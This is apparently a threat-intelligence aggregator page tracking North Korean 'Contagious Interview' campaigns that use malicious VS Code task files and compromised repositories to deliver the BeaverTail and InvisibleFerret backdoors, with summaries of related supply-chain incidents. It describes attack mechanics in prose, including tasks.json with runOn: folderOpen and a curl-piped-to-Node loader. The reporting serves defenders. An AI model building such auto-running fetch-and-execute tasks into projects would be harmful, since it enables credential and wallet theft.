Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

BeaverTail and InvisibleFerret backdoor delivery via malicious VS Code task abuse

Malware Activity
First reported
Last updated
Happening score
H score 28
2 unique sources, 6 articles

Summary

Hide ▲

North Korean threat actors tied to Contagious Interview are using malicious Visual Studio Code (VS Code) tasks and injected code in compromised developer repositories to spread malware through the software supply chain and steal crypto wallet credentials and other secrets. The activity also includes BeaverTail and InvisibleFerret, and in March Trend Micro said it found more than 750 infected code repositories, more than 500 malicious VS Code task configurations, and 101 commit-tampering instances; the campaign also uses Tron, Aptos, and Binance Smart Chain for payload staging.

Related Happenings

GlassWorm supply-chain malware activity

Malware Activity
First: 27.05.2026 14:48 Last: 27.05.2026 14:48 Sources 1

About this happening: The **GlassWorm** malware activity is now under a coordinated **C2 disruption**, reducing its ability to deliver new instructions and payloads to infected developer systems. The o...

Open Happening

TeamPCP opens its offensive framework to copycat supply-chain attackers

Threat Actor Meta
First: 19.05.2026 07:54 Last: 19.05.2026 07:54 Sources 1

About this happening: **TeamPCP** has started distributing its **offensive framework source code**, turning a single supply-chain operation into reusable tradecraft that other threat actors can adopt....

Open Happening

Shai-Hulud worm clone activity on NPM

Malware Activity
First: 18.05.2026 12:45 Last: 18.05.2026 12:45 Sources 1

About this happening: The **Shai-Hulud** malware activity has continued to evolve across the **npm supply chain** and related developer ecosystems. It first infected **npm packages** in **September 202...

Open Happening

MuddyWater broad cyber-espionage campaign across sectors and countries

Campaign
First: 14.05.2026 00:59 Last: 14.05.2026 00:59 Sources 1

About this happening: **MuddyWater** was tied to a **2026 espionage campaign** affecting **at least nine organizations** across **nine countries** on **four continents**, with victims in **industrial a...

Open Happening

Mini Shai-Hulud supply-chain campaign targeting npm and PyPI

Campaign
First: 12.05.2026 17:45 Last: 12.05.2026 17:45 Sources 1

About this happening: The **Mini Shai-Hulud** **supply-chain campaign** linked to **TeamPCP** expanded into downstream victim reporting, including **Grafana Labs**. Grafana said its **GitHub environmen...

Latest development: 21.05.2026 11:00

Grafana Labs said its GitHub environment was accessed and its codebase downloaded, with additional internal operational information taken from GitHub repositories, after compromise linked to the Mini Shai-Hulud campaign and TanStack npm packages. Grafana said it first spotted malicious activity on May 11, discovered the unauthorized download on May 17, and after contact from the ransom gang rotated automation tokens, enabled enhanced monitoring, audited commits since the May 11 incident, and hardened its GitHub security posture, while saying there is no indication customer production systems or operations were compromised.

Open Happening

Timeline

  1. 22.04.2026 17:48 1 articles · 1mo ago

    Contagious Interview becomes self-propagating supply chain malware

    Campaign Scope Update

    North Korean actor Void Dokkaebi, aka Famous Chollima, is turning the Contagious Interview fake-job lure into a self-propagating software supply-chain infection that abuses compromised developer repositories, malicious VS Code tasks, and injected code to spread malware and steal credentials. The campaign targets developers seeking work, can hide a poisoned .vscode folder in committed code, and Trend Micro said it found more than 750 infected code repositories, more than 500 malicious VS Code task configurations, and 101 commit-tampering instances in March.

    Show sources
    Open in new tab
  2. 20.01.2026 20:41 4 articles · 4mo ago

    Contagious Interview uses malicious VS Code projects for backdoor delivery

    Initial Disclosure

    North Korean threat actors tied to Contagious Interview used malicious Microsoft Visual Studio Code (VS Code) projects to lure developers into opening Git repositories that abuse task configuration files, including `tasks.json` and `runOn: folderOpen`, to fetch JavaScript from Vercel-hosted infrastructure and deploy backdoors on compromised endpoints. The activity includes the delivery of BeaverTail and InvisibleFerret, a macOS path that uses `nohup bash -c` and `curl -s` to pipe JavaScript into the Node.js runtime, and related variants that fall back to `grayavatar`, Tsunami (aka TsunamiKit), XMRig, and AnyDesk.

    Show sources
    Open in new tab
  3. 16.10.2025 17:56 1 articles · 7mo ago

    UNC5342 adopts EtherHiding for Contagious Interview delivery

    Technical Analysis Update

    Google Threat Intelligence Group attributed UNC5342, a North Korean threat cluster also tracked as CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, and Void Dokkaebi, with using EtherHiding since February 2025 to distribute malware and enable cryptocurrency theft through BNB Smart Chain (BSC) or Ethereum smart contracts, alongside the Contagious Interview chain that uses npm packages, BeaverTail, JADESNOW, and InvisibleFerret against Windows, macOS, and Linux systems.

    Show sources
    Open in new tab